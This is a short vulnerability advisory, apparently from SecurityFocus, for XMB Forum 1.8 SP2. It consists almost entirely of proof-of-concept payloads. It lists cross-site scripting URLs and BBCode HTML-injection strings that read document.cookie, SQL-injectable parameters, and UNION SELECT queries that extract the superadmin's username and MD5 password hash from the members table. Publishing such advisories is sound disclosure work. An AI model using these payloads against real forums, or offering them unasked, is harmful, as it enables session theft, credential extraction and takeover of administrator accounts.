XMB Forum Multiple Input Validation Vulnerabilities

The following proof of concept has been supplied:

Cross-Site Scripting:
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>
http://www.example.com/xmb18sp2/member.php?action=viewpro&member=x<%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript>

HTML Injection:
text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]
text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2

SQL Injection:
http://www.example.com/xmb18sp2/viewthread.php?tid=1&ppp=x
http://www.example.com/xmb18sp2/misc.php?action=list&order=postnum&desc=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&tpp=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x
http://www.example.com/xmb18sp2/stats.php?action=view&addon=x

Getting username for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/*

Getting password's md5 hash for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*


 

Privacy Statement
Copyright 2010, SecurityFocus